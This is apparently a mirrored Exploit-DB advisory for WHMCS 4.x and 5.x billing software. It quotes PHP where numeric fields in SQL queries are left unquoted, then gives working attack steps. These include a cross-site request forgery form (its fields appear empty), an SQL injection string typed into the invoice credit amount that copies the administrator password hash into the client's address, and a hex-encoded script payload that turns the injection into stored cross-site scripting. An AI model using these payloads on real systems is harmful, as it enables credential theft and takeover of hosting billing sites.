WHMCompleteSolution (WHMCS) 4.x/5.x – Multiple Web Vulnerabilities

Exploit Database
105 阅读

作者： AhwAk20o0 --

日期： 2013-12-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/30246/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

# Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities

# Date: 2013-12-10

# Exploit Author: ahwak2000

# Vendor Homepage: http://whmcs.com/

# Version: 4.x , 5.x

# Tested on: win 7

+------------------+

| Vulnerability|

+------------------+

File : includes\dbfunctions.php

function db_escape_string($string) {

$string = mysql_real_escape_string($string);

return $string;

}

+------------------+

| Description|

+------------------+

the script use this function to secure the input

the function disable only the ' and "

but we can bypass itif the query don't use '

+------------+

| Example|

+------------+

file : admin/invoices.php

[...]

$query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";

full_query($query);

[...]

+------------+

|Exploitation|

+------------+

CSRF to SQL And Bypass Token

<html>

<form name="myForm" id="myForm"

action="http://localhost/whmcs5214/admin/invoices.php" method="post">

</form>

</html>

<html>

<form name="myForm" id="myForm"

action="http://localhost/whmcs5214/admin/invoices.php" method="post">

</form>

</html>

+------------+

| Example 2|

+------------+

file : includes/invoicefunctions.php

function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {

$query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";

full_query($query);

$query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";

full_query($query);

[...]

}

File: /viewinvoice.php

if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {

$creditamount = $whmcs->get_req_var("creditamount");

if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {

check_token();

if ($creditbal < $creditamount) {

echo $_LANG['invoiceaddcreditovercredit'];

exit();

}

else {

if ($balance < $creditamount) {

echo $_LANG['invoiceaddcreditoverbalance'];

exit();

}

else {

applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);

}

redir("id=" . $invoiceid);

}

$smartyvalues['manualapplycredit'] = true;

$smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");

if (!$creditamount) {

$creditamount = ($balance <= $creditbal ? $balance : $creditbal);

}

$smartyvalues['creditamount'] = $creditamount;

}

+------------+

|Exploitation|

+------------+

Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1<~ edit

if client have creditt and when he want to pay with credit

in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)

the admin password will be in the client address

+-----------------+

sql => xss

SQL can convert to XSS

Must Encode XSS to Hex

Example :

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E) //<script>alert('ahwak2000');</script>

SQL can be modified to work when all members and supervisors

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~

+-------------------+

./END